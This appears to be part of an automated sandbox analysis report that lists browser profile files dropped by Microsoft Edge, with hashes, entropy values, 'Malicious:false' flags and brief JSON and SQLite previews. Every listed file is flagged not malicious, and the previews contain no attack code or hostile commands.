                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380382400412093","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380382403380192","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",f
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):40
                                                                                                                                                                                                      Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                      MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                      SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                      SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                      SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1500
                                                                                                                                                                                                      Entropy (8bit):5.303453894235476
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:YcCp/WwC5mWwFGJ/I3RdsfZVMdmRdsApZFRudFGRw6ma3yeesw6maPsw6C1MYhbW:YcCpfC0gCzsBtsMfc7leeBkBKYhbyDF
                                                                                                                                                                                                      MD5:4759E4A9CF05FB7CA7F44496B3FE6831
                                                                                                                                                                                                      SHA1:FB5FF10C653FA7408517AA3935F863F72F797782
                                                                                                                                                                                                      SHA-256:EF6D357E7C6B895D3AE7C01A5D5E76A0BEBC48EE3163491043044184CFB602C8
                                                                                                                                                                                                      SHA-512:DCB5388CA2990851127C2C357905C7D37746E08224DA008CCF39FFB8B5572E33E9C5B9684D1061AE0BAA08D53B351B4F59BD899A1C341EB3EF64410C07AE2DA5
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380382400412093","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380382403380192","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",f
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):36864
                                                                                                                                                                                                      Entropy (8bit):1.112048209896695
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:48:TFkIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB8n:JkIEumQv8m1ccnvS69WD1cI9e6W1a
                                                                                                                                                                                                      MD5:0813C1E932815B069FB29F2C213CBD72
                                                                                                                                                                                                      SHA1:DA52B44D76A92139F62553349BFCD57936D5656D
                                                                                                                                                                                                      SHA-256:E1449FF816B2A890FF23B6BE717086CF5B4AB5BE9F564BDDBC0928D99935A074
                                                                                                                                                                                                      SHA-512:9D0306CF5F0160FDCA1B14F95510BB07A84694EDC204FDE1D376B1EA0A700D892C2CC4B49C699B11AB6DBC582DE90E8F84F8257B20A2EB9997BE22F68CDD8C9E
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):40
                                                                                                                                                                                                      Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                      MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                      SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                      SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                      SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                      Entropy (8bit):0.7391107375212417
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:TLSnAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3isvhldvd0dtdjiG1d6XfN:TLSOUOq0afDdWec9sJAhvlXI7J5fc
                                                                                                                                                                                                      MD5:A74BFDCBFB880F469AD54BEF7B1B0C88
                                                                                                                                                                                                      SHA1:0012DD82FEB43839A30557EAF9E8DB2EB7259142
                                                                                                                                                                                                      SHA-256:63DFF3D10BF10F8F5326776956AF6DE1463CF0A14792C4451D4A76EFA1BF4BA2
                                                                                                                                                                                                      SHA-512:203FC220BF05344052340CCC6F77233669C200FDC6596EEE6F5D1E2203328D7D116BF07DE664D1D60EA2CD96F006406A9F0A2035BFAA86C93A103193E6EA4583
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):6144
                                                                                                                                                                                                      Entropy (8bit):0.8037009956260627
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:LBtiuWkKcwF11DM/FAf4AaVBuZO7L0rqq9HzOX:LLiuW9LFPY/Wf4ATo0rqqBzK
                                                                                                                                                                                                      MD5:DDDDA2C431DC7F1A525BC4480020079E
                                                                                                                                                                                                      SHA1:06052A3197167743125E72F58336F3E7603A9BF1
                                                                                                                                                                                                      SHA-256:4C0CE66B46495E0134850B8E8A8FE31D783D6A629B091EB1AEB0B96A4CB50817
                                                                                                                                                                                                      SHA-512:DEFAAD70C326285E5CC0AED068A8335154799274BB1A5E04D9A36499B44F9BE3EA60363B5359CF0D8B3C7E96C27B75BFC4516A338AB4F30A2FEF379805867A7B
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):9371
                                                                                                                                                                                                      Entropy (8bit):5.087048301326224
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:192:stZSzszhxyaNP9kj3q82bV+FiAxOOGPuYJ:stZksVxtJjbGiEOv
                                                                                                                                                                                                      MD5:13EB523A5CBE9CB951E132B5CDECBF5A
                                                                                                                                                                                                      SHA1:2D2A99366DDC1C951CEE0D08BE5668EE5ECC56C1
                                                                                                                                                                                                      SHA-256:A11FBC52D270F5EC5F5F783E489A45963BC853431B0B76B7657EC59C0021076F
                                                                                                                                                                                                      SHA-512:1D6E7356AD71F9CCD64DEE79117CD3EFB90524A58BF9AF3F67ECE58FBFC75FBB232DB4E8BFA2849D168D91160A5B5489E51178156EF633F0A62797E434D7B540
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377790397289529","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1024,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dip
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):9371
                                                                                                                                                                                                      Entropy (8bit):5.087048301326224
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:192:stZSzszhxyaNP9kj3q82bV+FiAxOOGPuYJ:stZksVxtJjbGiEOv
                                                                                                                                                                                                      MD5:13EB523A5CBE9CB951E132B5CDECBF5A
                                                                                                                                                                                                      SHA1:2D2A99366DDC1C951CEE0D08BE5668EE5ECC56C1
                                                                                                                                                                                                      SHA-256:A11FBC52D270F5EC5F5F783E489A45963BC853431B0B76B7657EC59C0021076F
                                                                                                                                                                                                      SHA-512:1D6E7356AD71F9CCD64DEE79117CD3EFB90524A58BF9AF3F67ECE58FBFC75FBB232DB4E8BFA2849D168D91160A5B5489E51178156EF633F0A62797E434D7B540
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377790397289529","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1024,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dip
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):9371
                                                                                                                                                                                                      Entropy (8bit):5.087048301326224
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:192:stZSzszhxyaNP9kj3q82bV+FiAxOOGPuYJ:stZksVxtJjbGiEOv
                                                                                                                                                                                                      MD5:13EB523A5CBE9CB951E132B5CDECBF5A
                                                                                                                                                                                                      SHA1:2D2A99366DDC1C951CEE0D08BE5668EE5ECC56C1
                                                                                                                                                                                                      SHA-256:A11FBC52D270F5EC5F5F783E489A45963BC853431B0B76B7657EC59C0021076F
                                                                                                                                                                                                      SHA-512:1D6E7356AD71F9CCD64DEE79117CD3EFB90524A58BF9AF3F67ECE58FBFC75FBB232DB4E8BFA2849D168D91160A5B5489E51178156EF633F0A62797E434D7B540
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377790397289529","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1024,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dip
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):9371
                                                                                                                                                                                                      Entropy (8bit):5.087048301326224
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:192:stZSzszhxyaNP9kj3q82bV+FiAxOOGPuYJ:stZksVxtJjbGiEOv
                                                                                                                                                                                                      MD5:13EB523A5CBE9CB951E132B5CDECBF5A
                                                                                                                                                                                                      SHA1:2D2A99366DDC1C951CEE0D08BE5668EE5ECC56C1
                                                                                                                                                                                                      SHA-256:A11FBC52D270F5EC5F5F783E489A45963BC853431B0B76B7657EC59C0021076F
                                                                                                                                                                                                      SHA-512:1D6E7356AD71F9CCD64DEE79117CD3EFB90524A58BF9AF3F67ECE58FBFC75FBB232DB4E8BFA2849D168D91160A5B5489E51178156EF633F0A62797E434D7B540
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377790397289529","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1024,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dip
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):9371
                                                                                                                                                                                                      Entropy (8bit):5.087048301326224
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:192:stZSzszhxyaNP9kj3q82bV+FiAxOOGPuYJ:stZksVxtJjbGiEOv
                                                                                                                                                                                                      MD5:13EB523A5CBE9CB951E132B5CDECBF5A
                                                                                                                                                                                                      SHA1:2D2A99366DDC1C951CEE0D08BE5668EE5ECC56C1
                                                                                                                                                                                                      SHA-256:A11FBC52D270F5EC5F5F783E489A45963BC853431B0B76B7657EC59C0021076F
                                                                                                                                                                                                      SHA-512:1D6E7356AD71F9CCD64DEE79117CD3EFB90524A58BF9AF3F67ECE58FBFC75FBB232DB4E8BFA2849D168D91160A5B5489E51178156EF633F0A62797E434D7B540
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377790397289529","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1024,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dip
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):25185
                                                                                                                                                                                                      Entropy (8bit):5.572075164956343
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:768:7U+GDhWPHXfGh8F1+UoAYDCx9Tuqh0VfUC9xbog/OV7llVRrw2Opgdtu9:7U+GDhWPHXfGhu1jaInVi23dtO
                                                                                                                                                                                                      MD5:D164ECAC376210C7A2883FB192B4925A
                                                                                                                                                                                                      SHA1:FF2FE5AB129608EBFFCEE9AA17911429AE33AF7E
                                                                                                                                                                                                      SHA-256:A9856BD474C3DF27D421F511ED674F9D01B9452D7A2CD93F7D9EFA4230720007
                                                                                                                                                                                                      SHA-512:DA79AE59055E631D9D45481F9BB25E899CD1EEAE778AECEDCF5C4B313FC43FF432F6ADB2C7D058FA35ED8D0B20B7E169CE064D5767C1EEE56CA1FBC853732787
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377790396853391","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13377790396853391","location":5,"ma
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):25185
                                                                                                                                                                                                      Entropy (8bit):5.572075164956343
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:768:7U+GDhWPHXfGh8F1+UoAYDCx9Tuqh0VfUC9xbog/OV7llVRrw2Opgdtu9:7U+GDhWPHXfGhu1jaInVi23dtO
                                                                                                                                                                                                      MD5:D164ECAC376210C7A2883FB192B4925A
                                                                                                                                                                                                      SHA1:FF2FE5AB129608EBFFCEE9AA17911429AE33AF7E
                                                                                                                                                                                                      SHA-256:A9856BD474C3DF27D421F511ED674F9D01B9452D7A2CD93F7D9EFA4230720007
                                                                                                                                                                                                      SHA-512:DA79AE59055E631D9D45481F9BB25E899CD1EEAE778AECEDCF5C4B313FC43FF432F6ADB2C7D058FA35ED8D0B20B7E169CE064D5767C1EEE56CA1FBC853732787
